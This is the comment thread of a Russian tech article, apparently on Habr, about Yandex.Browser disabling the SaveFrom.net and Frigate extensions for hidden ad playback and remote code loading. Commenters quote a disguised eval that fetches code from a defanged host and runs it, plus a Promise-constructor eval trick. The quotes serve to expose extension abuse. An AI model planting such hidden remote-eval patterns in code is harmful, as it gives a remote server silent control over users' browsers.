тот случай когда жабаскриптерцы хапнули жабаскрипта, способов встроить трояны в код просто миллионы!

[MaxALebedev]

Сегодня как раз Касперский ругался, что какое-то расширение в хроме ведет себя неправильно. Никак не мог фригейт в этом заподозрить, а вон оно как.

[maxlilt]

Вангую, следующим уберут Browsec.

[kukutz]

Если они не будут ставить такие сомнительные штуки в свое расширение, то зачем его убирать?

[killovv]

Разработчикам расширений тоже хочется заработать, а возможности для монетизации расширений особо то инет, кроме донатов. Но все же имея такую аудиторию, можно было придумать и более лояльные к пользователям способы монетизации…

ps. не знал что так можно xD
> Promise['constructor']('console.log(1)')()

[vaque]

Ребята, грамотно. Актуально!
сегодня вы мне помогли, а то я бы ещё полгода бы ломал голову.
на оперу чуть не перешел. респект!

[3aBulon]

Нне, ребят. SaveFrom.net изначально поставлялся в я.браузере, нет? я что-то путаю?

«13 июн 2019… Использование SaveFrom.net в Яндекс.Браузере. По умолчанию данное расширение является предустановленным в Я.Браузер, а это...»

[kukutz]

Оно не предустановленное, оно было на витрине магазина расширений, это так.

[killovv]

У меня яндекс браузер стоит только для тестов, и до сегодня в нем стоял SaveFrom.net, но я не помню чтобы его ставил, да и нужды не было

в основном браузере, давно не использую никаких загрузчиков, так как все к которым я заглядывал под капот, делали больше чем должны…

[ckuridin]

Отключить-отключили, а альтернативные варианты предоставили? Как теперь скачивать видео с Ютуба?

[BarakAdama]

И в конце поста, и в комментариях есть ответы про это.
А как предлагает поступить вы?

[jryj]

Способов скачать десятки — начиная от подстановки «ss» в ссылку и заканчивая ботами в телеграме. Выбирай любой.

[darthslider]

Общее прокси/впн — как общее нижнее бельё :(

[kukutz]

А потом разработчик коммитит в репозиторий совершенно невинно выглядящий код, который eval()-ит строчку из интернета. Например, из одного из расширений:

$.post('http://somesite[.]ru/ext/stat?' + $.param(params), function (res)
{
        res && console.log.constructor(res)();  // это eval
});

[kwaskoff]

потому и есть f-droid. Где большую часть подобного может быть отсечена на этапе «принятия» кода. Ну и ревью ручками тоже делают, хотяб бегло

[habrohabrouser]

Ревью ручками N тысяч строк кода одного расширения с сотней другой файлов… 180 000 примерно столько сейчас расширений.

[killovv]

в будущих спецификациях Manifest V3 у расширений не будет доступа:
— к загрузке кода из вне (не точно)
— внедрение генерированного кода во вкладки (только функции и файлы самого расширения)
— к построению DOM из бакграунда (так как будет только воркер)

Это усложнит внедрение непроверенного кода, но я считаю что расширениям нужно предоставить полный карт-бланш, но спрашивать для всего разрешения у конечного пользователя

[habrohabrouser]

Вы же знаете насколько силен и богат русский язык. Обезличенные данные, например, для одного это означает только id браузера, а для другого всю его историю посещений без привязки к ФИО. Тут об этом уже говорили. Можно все так написать, что никто ничего не поймет и вы забываете, что никто ничего не читает, особенно если тексты большие и непонятные. А непонятные они будут для 99.9% пользователей.

[alsoijw]

в будущих спецификациях Manifest V3 у расширений не будет доступа:

Это уже давным давно реализовано, и даже больше, в curl. А расширения к браузеру должны иметь больше функционала, иначе они будут бесполезны

[killovv]

Чего вы так переживаете? Если рекламщики ничего не поменяют, блокировать ее будет также легко как и сейчас

А сделать рекламу неблокируемой можно уже давно (шадоудом + проксирование)

[killovv]

Фильтрация по урлам останется, урежут только доступ в пересылаемые данные.

Не обновлять или собрать свой браузер никто же не мешает xD

[dartraiden]

Разработчик указывает ссылку на git-репозиторий с исходниками. Всё.

Пользователи проклянут вас на убиение кучи проприетарных дополнений.

[shurricken]

странно, мне кажется я еще околj года назад искал, что странные процессы у меня включаются вместе с хромом. Savefromnet тогда же вычислил и отключил… там и понятно что это для монетизации было сделано.
А вот фригейт заподозрил,… нашел где-то что другие тоже его заподозрили… но на всех ресурсах его по прежнему советовали
я пробовал заменять на «блокировки рунета»… но там свои прокси надо для несписочных сайтов.
А теперь вдруг как открытие… странно что раньше шума не было… при том что я не спец а ламер по большому счету…

[NIkky-Eucariot]

Спасибо, Savefromnet из ФФ тоже, стало быть, придётся удалять.

[anomatver]

SaveFromNet давно продался — раньше удобное расширение было, затем пошла монетизация оголтелая, поэтому не удивлен. На самом деле грустно, что расширения, которые борются против монополизаций (в каком-то смысле этого слова) быстро переобуваются и становятся еще хуже. В начале статьи хотел было поругаться на то, что Яндекс злоупотребляет своим положением, но ближе к середине передумал. Хорошая работа.

[UksusoFF]

Гораздо интереснее было бы прочить как SaveFromNet вообще оказался в браузере. Он ведь изначально не совсем для легальных целей использовался.

[vikarti]

С точки зрения многих пользователей — скачивыть ролики с youtube/vk — это легально.
(и вообще по закону ж можно (распространять нельзя если не fair use) а правила сайтов — а зачем читать).
Так что Savefrom ручками ставят по гайду на сайте (там процедура чуть запутаная).

[UksusoFF]

Самим поставить — это одно. И когда Яндекс дает его всем из коробки — это несколько другое.

[UksusoFF]

Потому что он там был в виде вкл\выкл на странице расширений. Его не надо было искать, просто зашел и выбрал — вкл.

[falcon4fun]

скачивыть ролики с youtube/vk — это легально.

Потому что, да. Далеко ходить не будем, yt-dl машет ручкой именно Вам месяц назад от вашего комментария. Ноябрь месяц.
xakep.ru/2020/11/16/youtube-dl-reinstates

[KivApple]

Вообще, во многих странах нелегально только распространение закопирайченных данных (есть нюанс, что загрузка torrent в 99% случаев автоматически является распространением, отсюда всякие ситуации «я просто скачал файл, а меня обвинили в распространении»). А для личного пользования скачивайте что хотите. Так что если скачивать музыку с ВК, чтобы закинуть на свой же плеер, а не чтобы выложить на рутрекер, то в целом всё ок. Ну правилам сайта, может быть, и противоречит, но максимальная санкция за их нарушение — блокировка учётной записи, они действуют только в рамках сервиса.

[UksusoFF]

Вопрос был не про легальность. Вопрос был про то как вообще расширение непонятно кем сделанное было в браузере предустановленным.

[DevAndrew]

Меня всегда настораживало то, с какой настойчивостью savefrom предлагает мне установить их расширение. Может быть кто то знает, почему им это выгодно может быть? (естественно если не брать во внимание злодеяния описанные в статье). Вроде как с точки зрения показа рекламы и подобного, им выгоднее, что бы я на сайт заходил к ним, и пользовался именно сайтом.

[alexeysakhon]

Да, мне тоже было непонятно, нафига они так настойчиво своё расширение предлагали установить.
Думал, что для последующей монетизации.
А монетизация… вот она какая получилась )))

[psy_AfterDark]

Несколько месяцев назад заметил то же, что написано в статье: в какой-то момент неожиданно начинала воспроизводиться реклама. Спасибо Яндекс.Браузеру за виджет «управление музыкой»: там отображаются все веб-страницы (как оказалось, ещё и приложения), на которых воспроизводится звук. По идентификатору приложения узнал, что это Frigate, удалил, жизнь наладилась

[sergey-b]

Что за виджет?

[psy_AfterDark]

Вероятно, неправильно назвал: есть боковая панель, и на ней есть в том числе «управление музыкой», возможность переключить трек, поставить на паузу, выключить звук, перейти на вкладку с источником звука. Ну и случае с темой статьи ещё и узнать, откуда вдруг доносится реклама

[sergey-b]

Боковая панель — удивительно бестолковое изобретение Яндекса. Всплывает при наведении мыши к левой стороне экрана, жутко бесит, и совершенно не учитывает варианты с 2 мониторами. Отключаю эту штуку сразу. Разработчикам Яндекса нравятся всякие всплывающие штуки. С парольным менеджером такая же фигня. Окошко его не просто появляется, а, зараза, "плавно", а потом еще так же плавно исчезает. И так пока вводишь логин и пароль 3-4 раза всплывает и уплывает.

[kukutz]

Панель очень удобна, если ее закрепить на экране в постоянном режиме. Там отличное управление вкладками, музыкой, быстрый поиск по истории и закладкам, плюс недавно появилась панель приложений, куда можно вынести любимые веб-аппы.

А про парольный менеджер можете пожалуйста чуточку подробнее? Которое окошко медленно выплывает? Саджест подстановки/сохранения пароля у поля ввода?

[sergey-b]

Я не сомневаюсь, что разработчикам, сидящим на работе с 40-дюймовыми мониторами, это удобно. Должно же быть какое-то разумное объяснение тому, что на мой экран они постоянно пытаются что-то впихнуть. В мобильном браузере уже даже пальцем ткнуть негде, от контента и поисковой строки не осталось ничего. В десктопной версии пока еще немного места для контента осталось, но со временем эта недоработка, я уверен, будет устранена.

[kukutz]

А про парольный менеджер можете пожалуйста чуточку подробнее? Которое окошко медленно выплывает? Саджест подстановки/сохранения пароля у поля ввода?

[kukutz]

Нашел личное сообщение, сорри.

[datacase]

Создатели одного говна — Яндекс.Бара и прочего, отключили другое говно.

[Alcpp]

Не пользуюсь SaveFrom & FriGate, но постоянно что-то скрытно открывает ссылки в хроме.

Есть версии кто это может быть?

[Alcpp]

Вот список моих расширений:

aapocclcgogkmnckokdopfmhonfmgoek: Slides: version 0_10
aedipmheomnpcbgmanofhaccebgapije: WebSpy: explore and test website: version 1_3_22
ahfgeienlihckogmohjhadlkjgocpleb: Web Store: version 0_2
aogjlhjkkcihgimccdodibjmpkpmgpad: Фейкогриз: version 0_0_12
aohghmighlieiainnegkcijnfilokake: Docs: version 0_10
aopohcdookcahpobjnopnkgieaolmplk: Учи сам. Сообщество изучающих иностранные языки.: version 2020_11_5_24174
apdfllckaahabafndbhieahigkjlhalf: Google Drive: version 14_5
blojlgglhfcmpigjbkllcgjmhincdjhb: Snow Web Application Metering: version 1_0_4
blpcfgokakmgnkcojhhkbfbldkacnbeo: YouTube: version 4_2_8
cfhdojbkjhnklbpkdaibdccddilifddb: Adblock Plus — free ad blocker: version 3_10_1
cjpalhdlnbpafiamejdnhcphjbkeiagm: uBlock Origin: version 1_31_2
eemlkeanncmjljgehlbplemhmdmalhdc: Chrome Connectivity Diagnostics: version 1_2_1
epcnnfbjfcgphgdmggkamkmgojdagdnn: uBlock — free ad blocker: version 0_9_5_25
felcaaldnbdncclmgdcncolpebgiejap: Sheets: version 1_2
fgmbnmjmbjenlhbefngfibmjkpbcljaj: Highlight This: finds and marks words: version 5_2_2
gfdkimpbcpahaombhbimeihdjnejgicl: Feedback: version 1_0
ghbmnnjooekpmoecnnnilnnbdlolhkhi: Google Docs Offline: version 1_21_0
kbfnbcaeplbcioakkpcpgfkobkghlhen: Grammarly for Chrome: version 14_990_0
kcpnkledgcbobhkgimpbmejgockkplob: Tracking Token Stripper: version 2_6
klbibkeccnjlkjkiokjodocebajanakg: The Great Suspender: version 7_1_8
kmendfapggjehodndflmmgagdbamhnfd: CryptoTokenExtension: version 0_9_74
laankejkbhbdhmipfmgcngdelahlfoji: StayFocusd: version 1_6_0
mcbpblocgmgfnpjjppndjkmgjaogfceg: Take Webpage Screenshots Entirely — FireShot: version 0_98_98
mfehgcgbbipciphmccgaenjidiccnmng: Cloud Print: version 0_1
mhjfbmdgcfjbbpaeojofohoefgiehjai: Chrome PDF Viewer: version 1
neajdppkdcdipfabeoofebfddakdcjhd: Google Network Speech: version 1_0
nkeimhogjdpnpccoofpliimaahmaaome: Google Hangouts: version 1_3_15
nmmhkkegccagdldgiimedpiccmgmieda: Chrome Web Store Payments: version 1_0_0_5
noaijdpnepcgjemiklgfkcfbkokogabh: ImTranslator: Translator, Dictionary, TTS: version 15_71
oldceeleldhonbafppcapldpdifcinji: Grammar and Spell Checker — LanguageTool: version 3_2_3
pjkljhegncpnkpknbcohdijeoejaedia: Gmail: version 8_3
pkedcjkdefgpdelpbcmbmeomcjbeemfm: Chrome Media Router: version 8720_1005_0_2

Чо списком из статьи не пересекается.

[kukutz]

Это может быть не расширение, а задача в планировщике винды или малварь. Стоит проверить антивирусом.

[Alcpp]

Уже на втором компе этот сайт втихаря открывается. Общего — только хром и его расширения.
Антивирус стоит.

[zartarn]

Скорее всего через хук цепляется к вендовому экслореру (грузится через реестр либо через пользователя), и периодически открывается. Подобное наблюдал когда скачивали драйвера с левых сайтов и там захарбраузер и подобное в комплекте. Есть несколько разных ресурсов где энтузиасты с помощью логов AVZ и подобного, помогают почистить пк.
Хотя полистая примеры с форума, по логу можно и самому сообразить.

[Alcpp]

Та нет, єто корпоративный комп. С антивирусом и свежей виндой. Драйвера не качал. Исключаю, что в реестре сидит. А вот какое-то расширение хрома этим пакостит.

[Alcpp]

Итак, «победителем» оказалось расширение "Great Suspender". После того, как гугл его отключил, обращение к тому же bornsecrent прекратилось.

[Devvver]

кликни два раза на нужный сайт и покажет кто его открыл.

[Alcpp]

После дабл-клика переходит на вкладку ФБ.

[Devvver]

Значить фрейм открыт ФБ.
Но встроить его туда могут и другие приложения и расширения

[sergey-b]

Каждый дефект ПО, как правило, исправляется по 2 направлениям. Сначала делается быстрофикс. Это комплекс мер, чтобы устранить сиеминутные проявления ошибки, чтобы пользователь смог получить тот результат, который ему нужен прямо сейчас.

Затем уже, когда основная острота симптомов снята, делается окончательное исправление. Проводится анализ причин, приведших к возникновению ошибки, и принимаются меры по устранению этих причин. ПО нужно доработать так, чтобы больше такая ошибка и аналогичные ей ошибки не возникали.

В статье описан лишь 1-й этап — лечение симптомов. Хотелось бы увидеть, какие планы у разработчиков по устранению предпосылок к возникновению таких ситуаций. Пока все выглядит так, что ничего не поменялось. Разработчики расширений имеют право делать все, что захотят, но так, чтобы пользователь не почувствовал. Возможно, осталось еще много расширений, которые сливают пользовательские данные, исполняют произвольный код, но просто их командные сервера еще не присылали своим ботнетам команду на проигрывание видео.

[kukutz]

Мы думаем над тем, как лучше отлавливать такие случаи, да. Плюс готовится внедрение расширений Manifest V3, где исполнение удаленного кода будет запрещено.

[SergeyPerm]

По-моему, этот Яндекс.Браузер попахивает так же как браузер Амиго и всякие подобные штуки, улучшатели, агенты и т.д. Меня например смущает, когда при установке одного софта, мне пытаются впарить еще и Яндекс.Браузер… А потом приходится вычищать всякие Алисы и подобную хрень. Грязный пиар. Лучше не связывайтесь.

[BarakAdama]

Но почему же? Вы говорите про предложения установить браузер при установке других бесплатных программ? Для их авторов это возможность окупить разработку своего продукта, а для пользователей получить его бесплатно. Можно сказать, что это одна из форм рекламы в продукте. Там может быть наш браузер, любой другой популярный браузер или что-то ещё. При этом Яндекс.Браузер не устанавливается тайно вместе с другим продуктом, всегда можно отказаться от такого предложения, да и удаляется полностью стандартными средствами системы и ничего специально вычищать не надо.

[Codenamed]

Например, потому что позволить себе такое продвижение могут только очень большие компании, чтобы с помощью бесплатных инструментов зарабатывать еще больше денег.

А большие компании это плохо для клиентов. Хорошо, когда компании маленькие, и для каждого продукта их много конкурирующих. И каждая может загнуться в любой момент, если разочарует или разозлит пользователей :)

[alsoijw]

Аналогично можно сказать и про гугл хром

[VladMgn]

Заметил у себя странное поведение, frigate не пользуюсь, а savefrom net было — ни с того ни с чего один из процессов браузера начинал нагружать ядро процессора, прибивал — браузер или падал или ничего не изменялось, как будто закрыл вкладку, потом появлялось сообщение, что расширение ошибку вызвало, затем и яндекс отключил его. Ищу замену )

[Swill]

Не дочитал, но чисто для справки: Сталкивался с проблемой неизвестно откуда идущего звука в других браузерах на том же движке. И в них не было расширения SaveFrom.net. В них вообще ничего не было, кроме uBlock и Ghostery. Поковырявшись в носу, я извлек оттуда, что адблок блокирует видео, а аудио — нет. Потому что оно идет отдельным потоком. И проблема эта касается только определенных страниц. Закрыл страницы — закрыл проблему. uBlock постепенно проапдейтился и тоже, скорее всего, повлиял на это.

[ed007]

Могу добавить, что на ipad safari обнаружил в последние месяцы десятикратный рост мобильного траффика — по гигу в день, причем основной источник — дзен. Ясно, что дыра на самом сайте! Причем решения нет, помогло только отключение джава скриптов, правда и сам яндекс перестал работать. В техподдержку писать перестал — там теперь «фильтры» и результативность «0», хотя сайт последние месяцы работал с постоянными багами.

[kukutz]

А как вы определили основной источник?

[ed007]

Когда открыта страница дзен временами видел максимальный трафик, хотя явно ничего не проигрывалось

[reroll]

Обычно не ставлю всякие расширения и если вдруг понадобится то в другой браузер, который редко использую. Проблему давно знаю с самого начала появления блокировщиков рекламы и тогда некоторые просто вставляли бота по накрутке.

[playnet]

По мне даже тихая накрутка лучше засилья назойливой рекламы. Но пока есть выбор — конечно, буду выбирать где нет ни того ни другого. Хотя тут встаёт вопрос, а чем монетизируются блокировщики…

[reroll]

они живут за счёт пожертвований и «допустимой» рекламы, но тут выбирать стоит осторожно поскольку некоторые продают всю информацию пользователя, поскольку имеют полный доступ не только к веб странице, но и заполняемым формам

[rodion-m]

Вопрос к Яндексу — возможно ли реализовать систему разрешений для расширений? По аналогии с разрешениями приложений в сторах. Такой подход решил бы проблему с произволом расширениями более глобально.

[kukutz]

Система разрешений есть, но расширения запрашивают слишком широкие права. В целом, готовится переход на расширения Manifest V3, где исполнение удаленного кода будет запрещено.

[infolex]

У меня на это все другой взгляд. Так, рассуждения. Ранее был прекрасный SaveFrom, качал все и вся, хочешь, вот тебе видео, хочешь, вот тебе аудио. Пользователям кайф, а вот VK, Google, Mail, Yandex это не понравилось. Как продавать прослушивание музыки без ограничений и просмотр видео без рекламы, если эти «гады» качаю все на девайс и спокойно смотрят, а еще и музыку без рекламы слушают, да еще и в фоне без подписки?
Быстро было принято решение.
Первый шаг: HLS. Плееру отдается M3U8, в нем медиа разбито на 3х секундные отрывки (чанки), плеер его воспроизводит. Но эти «гады» сломали, и опять качают медиа…
Второй шаг: плееру отдается HLS с рандомным шифрованием чанка, т.е. при воспроизведении 9 минутного трека мы получаем плейлист из 180 трехсекундных медиафайлов, часть которых идет в оригинале, часть зашифрована в AES-128, часть в AES-256. Опять сломали, да еще и палками закидали, что юзеры жалуются, что дешифровщик жрет CPU при проигрывании. Новости об этом конечно же удалили, даже в кэшах найти не могу, молодцы.
Что остается делать? Купить SaveFrom, Yt-dlи прочих, запушить в них майнеров/троянов, провести «расследование» и запретить. А то вдруг кто-нибудь прослушает трек без рекламы или скачает видео)
Данное сообщение не спонтанное, у меня уже куча самописного софта, чтобы банально накидать музыки на флэшку для прослушивания в авто, а борьба эта идет уже пару лет как минимум

[ilya-zharskiy]

конкретно savefromnet убили сами яндексы, прикрутив к нему неотключаемый и ненастраиваемый Советник Яндекс.Маркета

[stardust1]

У меня такой вопрос: Иногда нужен для покупки VPN. Может ли расширение HolaVPN (или другие такие расширения) считать мои данные оплаты (логин и пароль для допустим PayPal, 2FA включена) и безопасно-ли оно для оплаты? Что оно p2p я знаю.

[kukutz]

В Яндекс.Браузере банковские и платежные сайты открываются в защищенном режиме, в котором расширениям по умолчанию недоступен контент страниц и их запросы. В других браузерах да, может считать данные оплаты.

[vikarti]

Каким образом определяется что сайт — платежный?
Как можно в это вмешается?
Как быть если какое то расширение — нужно и там тоже?(BitWarden например)

[eegdude]

>> Frigate CDN
Это что, бесплатный ВПН продает своих пользователей и используется для фрода? Как так, не может быть, не верю

[bilayan]

Ну совсем бесплатным он никогда небыл. Даже до вот этой подозрительной активности, у них было, что на сайтах магазинов встраивалась панель, где показывались аналогичные товары в яндекс маркете или что то такое (т.е. у них была и условно более менее нормальная партнерка когда то). Учитывая такое массовое поведение аналогичное не у одного расширения — я бы все же погрешил на партнера, если принимать за правду это сообщение, то даже похоже на правду.

[JimDi]

и это вполне отключалось в настройках

[RangerRU]

Сегодня мы приняли решение отключить расширения SaveFrom.net, Frigate Light, Frigate CDN и некоторые другие, установленные у пользователей Яндекс.Браузера. Совокупная аудитория этих инструментов превышает 8 млн человек.

Ложь.

Frigate уже как две недели МИНИМУМ не работает / отключается браузером.
Сначала из стора пропал. Решил с со стора хрома поставить — работает буквально минут 10-30 и отключается опять (или удаляется, не суть).

Пришлось ставить Хром, перетаскивать закладки и остальное.
Яндекс снесли.

[BarakAdama]

В Chrome Web Store его тоже больше нет.

pikabu.ru/story/google_otklyuchil_frigate_v_chrome_vsled_za_yandeksom_7929625

[DYUMON]

На эти расширения не жалуюсь, а вот как то версия adblock с встроенным майнером попадалась.

[rvt]

SaveFrom.net у меня подключен не напрямую, а через MeddleMonkey. И, вроде бы, все нормально.

[Latrommy]

Сказал бы что я думаю, но не буду. Минусами закидают. Моя мечта — пчёлы против мёда. Когда хабравчанину предложат «Senior jsavascript developer», он спросит «А чем я буду заниматься?», но не «Сколько?». Но, увы,
«Они говорят: им нельзя рисковать,
Потому что у них есть дом, в доме горит свет.
И я не знаю точно, кто из нас прав,
Меня ждет на улице дождь, их ждет дома обед.»
Они «любят жизнь». И продадут всё что угодно, только бы «Остаться в живых...».
Я не «последний герой», я против «капитализма» (читайте Маркса), и считаю, что «Никакая игра не стоит свеч, кроме одной. Свечи игрока».
В общем — программисты, работающие над вышеупомянутыми расширениями — ОЧЕНЬ НЕХОРОШИЕ ЛЮДИ. Всё. Дальше молчу.

[AllegroMod]

kukutz вы не могли бы очень в общих словах поделиться тем, как устроены рабочие процессы Яндекса, из-за которых вышло, что после жалоб на фоновое проигрывание рекламы не было никакого код-ревью приложения со стороны сотрудников Яндекса, а просто попросили разработчиков малвари устранить недоработки? В чём тогда заключается процесс одобрения расширений в магазине перед публикацией?

[SkyLinkAstray]

Чуваки, неужели никто не может выпилить троян с этого расширения и выложить его на гитхаб?
Лично для меня это большая потеря этого расширения т.к.он был удобен во всем, и нет ни одного такого же аналога как по интерфейсу удобности использования так и по пользованию прокси, какие впн ща не наустанавливал ни один не открывает так быстро страницы как открывал фригейт, и к тому же огромный плюс фригейта был в том что он в включенном режиме врубал прокси лишь на те сайты на которые мне нужно,(я сейчас про frigate3 proxy helper), и если сайт не открывался то в два клика по расширению можно было добавить сайт.А эти бл*дские впны не умеют работать как фригейт3 и приходится вручную добавлять теперь в вайтлисты сайты на которых мне прокси не нужен, только вот в быстроте открытия страниц все равно впны открывают их долго что значит они все равно юзают прокси даже если добавляешь в вайтлист сайт либо у меня шуе уже полное, но блин.**Есть какие нибудь способы врубить фригейт?**мне пофиг на троян или что там, мне не принципиально что он там видосы майнит или еще чего, комп никогда не тормозил, но то что хром(пользуюсь только им) в наглую просто лишает возможности врубать впн из-за какого то кода, это сверх идиотизм, лично для меня.

[dartraiden]

Вместо написания матерных комментариев стоило потратить время на изучение того, как настроить маршрутизацию. Через VPN можно пустить как весь трафик, так и трафик до отдельных ресурсов.

Например, это можно сделать прямо на роутере: VPN Policy Routing в OpenWrt, управление маршрутами в KeeneticOS, либо на компьютере под управлением Windows или Linux.

Кроме того, есть бесплатные Antizapret / Zaborona, владельцы которых уже сделали это всё на своей стороне — через них идёт трафик лишь до заблокированных в России / Украине ресурсов.

[Ruslannn]

Слышал об этой проблеме, не ожидал от яндекса такой оперативности

[thinganguyen]

А я долго искал откуда у меня звук идёт, но в итоге пришлось от браузера отказаться.

[Wohlstand]

Интересно, а что тогда в версии расширения SaveFrom.net для FireFox? Надо будет кое-что проверить…

[Geraldim]

Спасибо за информацию, поудаляю их, если остались

[jin_x]

Лично у меня friGate CDN прекрасно работает в ЯБ. Где ж его заблочили? Или уже решили проблему ним?

[Yorshick321]

Отключить — это одно, а альтернативу предоставить?

[BarakAdama]

Альтернатив хватает.

[SkyLinkAstray]

Альтернатив ему нету.

[tundrawolf_kiba]

Я после нескольких дней подбора остановился пока что на «Обход блокировок рунета» в качестве замены «Frigate» и «Skyload» в качестве замены «savefrom.net»

[SkyLinkAstray]

Также само

[DeuterideLitium6]

А я что-то по пользовался яндекс-браузером, и забросил его. Как и давно удалил хроньку, вес 150 МБ, а функций около нуля.
То же помню звук видеостраницы закрытой, в первые момент ничего не понял, звучала именно реклама, и вырубил яндекс в диспетчере. Желания пользоваться этим поделием сразу пропало. У некоторых браузерах SaveFrom.net работает более или менее нормально, а как ещё видео с ютуба качать? Попробовал всякий софт, ни один работал. А в файрфоксе SaveFrom.net работает!
ЗЫ
Да, для меня хороший браузер, который может нормально сохранить, а за тем открыть любую страницу. Хронька во обще этого делать не умела. А у ЯБ не помню чтобы что-то сохранял, изначально было пренебрежительное отношения этому софту, хотя немного я им попользовался.

[FishDude]

Скрипнул зубами, и поставил friGate в режиме разработчика как «запакованное расширение».
Извините, Яндексы, мне борьба с трижды проклятой украинской цензурой ныне даже важнее безопасности.

[mva]

А можно поинтересоваться почему автор статьи пишет "зашифровано на ключе" вместо "зашифровано с использованием ключа", или хотя бы "зашифровано ключом"?
Что за "на ключе"?...

[Dron007]

Я так понял, в friGate весь profiler.js ни для чего полезного не используется? Поставил в начале initProfiler() return. Вроде бы всё работает. Но в других файлах там столько всего обфусцированного и, кстати, с вызовами Яндекс Советника, что уверенности нет.

[Dron007]

Ещё припоминаю, что friGate давным-давно слал запросы с информацией о посещаемых страницах на сервера s1814.thetrafficstat.net и s814.thetrafficstat.net. Причём не помогало даже его отключение по клику на иконке (если через настройки расширений выключить, то, конечно, отключался). Описывал это на их форуме, те ответили что-то невразумительное.

[SeVa_seva_sEvA]

На меня к счастью эта новость не повлияет, привык уже к яндексу с теми условиями что не скачивает всякий мусор без согласия, не то что другие браузеры

[annnmihs]

Спасибо за разъяснения

[Lamberg007]

З-забота

[Demka78]

Даже и не узнал бы о такой проблеме так как использую два браузера

[Tolyanderv]

vpn в браузере -это лишнее

[AcidStem]

Подумаешь реклама, она сейчас есть во всем условно бесплатном. Я просто отключал расширение когда не пользовался им.

[Agent911]

Возможно мое пожелание не к месту, но можно, ползьзуясь случаем, попросить выкинуть нах! как минимум «Советник» с его настойчивым дружелюбием «что он знает где дешевле». Я понимаю, что ща вылезет специально обученный чел и будет втирать, шта мне это кажется и это быть не может. ОК. Выпилить приложение, чтоб его не было в прЫнципе (а только в каталоге Дополнений), как, например, сейчас в Я-Бразвере нет спецрасширений антивирусов.
Да, эта зараза НЕ всегда вылезает, а когда вылезает диву даешься, что она отключена. Баги, вирусы, колдунство?? Особенно характерно в местах, где он уже стоял, но был отключен.

P.S. Ну и традиционный юмор наших дней "Если у вас паранойя, это еще не значит, что за вами никто не следит". Не следит Сэйф фром нет, так 5 копеек вставит Я-Б иди Г-Х. Или совместное предприятие «Рог и копытО», например, по данной схеме habr.com/ru/post/410159 (не обязательно быть злобным хацкером, можно быть транснациональной компанией в отрасли информационных технологий, зарегистрированной в Нидерландах).

[Shtaer312]

Спасибо! Это очень интересно!
У меня выскочило, что нужно обновить расширение электронной подписи - не знаю что и делать, обновлять или нет.
Ещё с некоторой регулярностью сбрасываются куки, по крайней мере вконтакте, но было что и всех приложений. Чуть ли не каждый день на ПК в браузере просит заново войти в Whatsapp, хотя на телефоне показывает, что старая сессия не закрыта.
Недавно с чего-то активировались все расширения, одно даже два раза висело на панели, пока не удалил его.